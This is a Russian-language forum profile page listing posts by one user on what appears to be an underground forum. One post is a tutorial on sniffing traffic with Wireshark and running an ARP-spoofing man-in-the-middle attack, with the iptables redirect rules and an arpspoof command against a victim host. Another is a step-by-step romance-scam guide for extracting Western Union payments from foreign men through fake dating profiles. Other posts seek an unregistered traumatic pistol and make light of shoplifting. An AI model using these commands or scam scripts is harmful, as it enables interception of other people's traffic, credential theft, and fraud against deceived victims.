
федя
Members-
Публикации
9 -
Зарегистрирован
-
Посещение
Никогда
Тип публикации
Профили
Форум
Календарь
Галерея
Блоги
Магазин
Файлы
Classifieds
Все публикации пользователя федя
-
Начнем по порядку. Установка и запуск WireShark WireShark - это известная утилита для анализа сетей. Для операционной системы Kali Linux она предоставлена в комплекте с набором основных программ. Есть версия для любителей Windows. Для установки на другие ОС Linux можно воспользоваться такой командой: sudo atp-get install wireshar После установки запустим утилиту. Можно запустить с помощью команды: sudo wireshark Интерфейс wireshark Дальше необходимо выбрать один из предложенных интерфейсов и начать анализ трафика. После запуска интерфейс программы будет разделен на три блока. Разделения интерфейса после запуска блок - настройка и управления утилитой. блок - пакеты, которые были перехвачены. блок - информация для расшифровки и получения данных с пакетов. Для тестирования можно открыть браузер и начать заходить на разные сайты, входить в формы авторизации, добавлять картинки и т.д. Потом можно остановить wireshark и посмотреть, какие данные были получены. Но так как в нашу утилиту попадают тонны трафика, то нужно использовать фильтры: 1. ip.proto - протокол 2. ip.src - отправитель 3. ip.dst - получатель 4. ip.addr - любой адрес Фильтры поддерживают использование логических операторов и выражений: == - присваивание || - логическое или & - логическое и > - больше < - меньше На примере можно использовать метод "GET". Введем в поле фильтра запрос "http.request.method == "GET". Находим запись и нажимаем правой кнопкой мыши Follow->TCP Stream. У меня получилось проанализировать пакет, в котором была загружена картинка на хост. Был получен формат, а также другая информация в USEr-Agent. Вот такими способами можно отсеивать не нужную информацию и искать полезные данные в WireShark. Таким способом можно получить авторизационные данные, а также полностью расшифровывать пакеты "telnet". Пример перехваченного пакета Сбор информации Далее нам нужно получить информацию о пользователях. Для этого можно использовать две утилиты netdiscover и fping. Начнем с первой, чтобы быстро получить список активных участников сети можно воспользоваться Nmap или netdiscover, но последний способ быстрее. sudo netdiscover После этого получаем информацию об участниках сети. Участники сети Если у вас очень много участников в сети, то можно воспользоваться утилитой fping. Для того чтобы просканировать необходимо ввести команду. После этого активные хосты будут отображены в файле: fping -Asg 192.168.1.0/24 -r 3 >> hosts_active.txt Информация об участниках в файле Эту информацию можно использовать в WireShark. Например, для фильтрации по конкретному IP, можно воспользоваться командой: ip.addr==192.168.0.100 Фильтрация по IP Или, например, фильтрация по MAC-адресу: eth.addr==68:3e:xx:xx:xx:xx Фильтрация по MAC-адресу Можно комбинировать запросы логическим «или» - ||: eth.addr==68:3e:xx:xx:xx:xx || igmp Комбинирование двух разных запросов MITM-атака Это, по сути, процесс, когда вы располагаетесь между роутером и пользователем сети и начинаете слушать все пакеты. Принцип действий хорошо показан на картинке: MITM-атака Для этих задач есть специальные утилиты, но можно сделать все и ручками. Для этого необходимо сначала включить IP-форвординг и изменить правила iptablex: sudo cat /proc/sys/net/ipv4/ip_forward #Проверка форвординга пакетов, если -включен, если 0-выключен. echo "1" > /proc/sys/net/ipv4/ip_forward #Включаем форвординг пакетов iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8282 #Перенаправляем трафик с 80 порта на 8282 iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8282 #Перенаправляем трафик с 443 порта на 8282 Далее необходимо запустить команду. Перед этим обязательно запустить WireShark для снифа трафика, чтобы потом его можно было проанализировать: arpfpoof -i <interface> -t <жертва> <шлюз> Например, если вы проводите эту атаку в сети и IP нашей цели 192.168.0.100, то команда будет иметь такой вид: arpspoof -i wlp3s0 -t 192.168.0.100 192.168.0.1 Далее с фильтрами и другими данными информация анализируется в WireShark. Заключение Внимательно относитесь к использованию Wi-Fi в публичных сетях. Возможно, кто-то перехватывает ваш трафик. Поэтому лучшие не использовать недостоверные сети для передачи важных и конфиденциальных данных.
- 1 ответ
-
- 3
-
-
Итак, тема заключается, как вы уже наверное поняли, в разводе турков, а можно не турков). На моем веку был француз один, испанец какой-то, но больше всего конечно турков. А сейчас я вам расскажу почему. Но начну с пункта действий) 1: Находим фото какой-то вашей дальней знакомой, или может даже подруга согласится дать свои фото ( Главное, чтобы она была не сильно красивая, не очень толстая) Ну короче, средняк. 2: Вам нужна будет какая-то знакомая. Она ни о чем не будет догадываться, вы ей просто будете говорить что нужно забрать деньги в банке, которое придут на ее имя через western union. 3: Заходим на сайт знакомств okcupid.com (Для меня он был самым нормальным, потому-что много турков, и не шарят в разводе), создаем там страницу и указываем имя Вашей подруги (в моем случае была Вероника (Это чтобы вы не удивлялись, почему я дальше буду использовать ее имя)) 4: Указываете город, типа Стамбула и т.д (Обязательно!) В общем теперь начинается общение. Вам сотнями начинают писать всякие иностранцы, у которых естественно только это в голове. Дальше они вас попросят номер, чтобы написать вам в watsupp или viber, Я давал номер, потому-что мне самому так было проще. И вот вы уже общаетесь, он просит вас прислать свое фото, вы естественно заходите на страницу девушки, у которой одолжили фото, находите там более менее домашнее селфи, и кидаете ему. Ну вот он в целом уже верит, что вы девушка в самом деле. Когда он спрашивает где вы живете, у меня всегда была одна и та же схема: Я работала в Стамбуле официанткой, но у моего паспорта истек срок пригодности и меня депортировали в Украину, а теперь я не могу продлить срок своего паспорта, и приходится работать за 100 долларов в месяц официанткой, но я никак не могу денег насобирать и т.д. Короче давите на жалость, но показываете что вы сильная и независимая девушка) (ПОМНИТЕ, ЧТО ДЕНЬГИ ВАМ ТАК СРАЗУ НЕ ПРИДУТ) В общем вы начинаете общаться, обмениваться всякими смайликами, в общем вы должны очутиться в шкуре девушки. Дальше, когда "вы" уже начинаете ему нравится, вы давите ему на ревность. Я обычно говорил так: У меня на работе начальник такой козел, пристает ко мне, предложил меня подвезти до дома на машине своей, гости лапают меня за жопу когда я прохожу мимо. Ну короче делаете всё, чтобы после вашего сообщения он вам написал: Не работайте там пожалуйста, не надо, я переживаю за вас и ля ля ля (короче у человека проснулось чувство что он и только он должен положить свое волосатое и потное тело на вас. Ну короче после этого вы говорите, что нужно зарабатывать на жизнь, в стране сейчас время тяжелое, и вы хотите уже сделать себе паспорт, чтобы наконец-то уехать с этого ужаса, найти в Турции мужчину себе и выйти за него замуж (не говорите, что именно за него хотите). А потом невзначай говорите, что вы на паспорт собрали уже 50$, а нужно 100. И вот тут начинается самое интересное. Он предлагает прислать вам денег, НО!!! Вы отказываетесь) Вы реально отказываетесь)) Пишите ему: Я не могу, это очень щедрый поступок, но я вот так не могу взять у чужого мне человека ТАКУЮ сумму денег! (Я просто обжигался на том, что когда сразу соглашался, то они хотели позвонить, или в скайпе пообщаться. А когда ломался, то потом они меня сами умоляли, чтобы я "взяла" деньги, сейчас поймете почему) В общем вы отказались, потом общаетесь с ним до следующего дня, а потом вечером говорите так: Вы представляете, меня сегодня начальник позвал на свидание в ресторан. Я не знаю, что делать. Но если я пойду в ресторан, то он мне может зарплату поднять, и я смогу сделать паспорт... Ну тут короче у вашего турка начинает так пукан бомбить, что Эрдроган думает, что это Россия на него напала и прячется под стол жуя свой галстук. А у вашего турка начинает пенится рот, он взбешен и т.д и опять начинает сулить вам ваши деньги. После чего вы говорите: Если я возьму у вас деньги, то только при одном условии, что когда я приеду в Турцию, то заработаю и всё вам отдам. Ну короче вы там договоритесь. Турок соглашается, вы даете ему имя и фамилию Своей подруги (Он же не заметит подставу, если вы будете записаны именем вашей подруги) После чего вы идете с подругой в банк, получаете деньги, с подругой рассчитываетесь и всё. Ну или как я делал, то просто подругу гнал в банк, она получала деньги, и мне на карту присылала (забрав свой процент естественно) И самое главное: Этот турок уже никуда не денется! Вот допустим, когда мне прислали 100$ , Я понял что он на крючке) Я нашел у оригинальной девушки (У которой брал фото) Фото в лифчике и пишу турку: Я такой лифчик классный нашла, но у меня денег нет, чтобы его купить :*( Ну короче давил на жалость ему, после чего он мне присылал еще 50$ на какую-то лабуду, ну а я кидал ему фото той девушки в лифчике))) Ну вот и вот так получалось, что в неделю я общался одновременно с 5ю турками, 3 из них мне кидали минимум по 50 у.е. P.S В этом деле главное терпение. Они начинают на мозг сильно капать, что после первого дня общения, тебе вообще ничего не хочется. Но если потерпеть, то выхлоп вас приятно удивит) Подводные камни: Когда скажет, что хочет приехать, вы должны дать понять что это невозможно. Я обычно говорил, что в моем городе вот-вот начнется война и тут опасно. Однажды даже сказал, что моего брата забрали на войну, и что нужно 100 у.е чтобы его выкупить)) 2: Если попросит вас в скайп, то скажите, что вам пришлось продать свой компьютер, ну или поломался)) Или попросите подругу чтобы та с ним по телефону поговорила)
- 2 ответа
-
- 6
-
-
robin возвращается в понедельник из Самары.Я думаю вам наберет. Если свяжусь с ним раньше передам чтоб вам набрал
-
Блокированный кипер невозможнео разблокировать, тс не гони админы проверьте персонажа, если за базар ответить не сможет - то забаньте кидалу
- 2 ответа
-
- 4
-
-
Куплю травмат (с доками или без)
федя ответил в тему пользователя geroilubovnik в Другие товары и услуги
если у кого есть предложения черканите в ПМ.- 4 ответа
-
- 3
-
-
Какие авто из самары есть в наличии?
-
в лс напиши по страховой! дам координаты
-
Вчера присутствовал в суде по шоплифтингу... ст.30ч3,ст.158ч1 УК РФ Лифтинг был на сумму более 8 тысяч... Чел спалился СБшникам магазина. Скинуть хабар не успел,но спулил съёмник-тупо прилепил к тележке. Начал выёбываться,те вызвали ментов... Менты довели всё до суда. В итоге чел получает от судьи штраф в 5 тысяч. Это капля в море,если учесть то,что с магазина того поднято в разы больше. Да,и ещё... Оплатить штраф нужно в течении месяца. Как только оплата пройдёт,то судимость погасится. Так что вот так вот...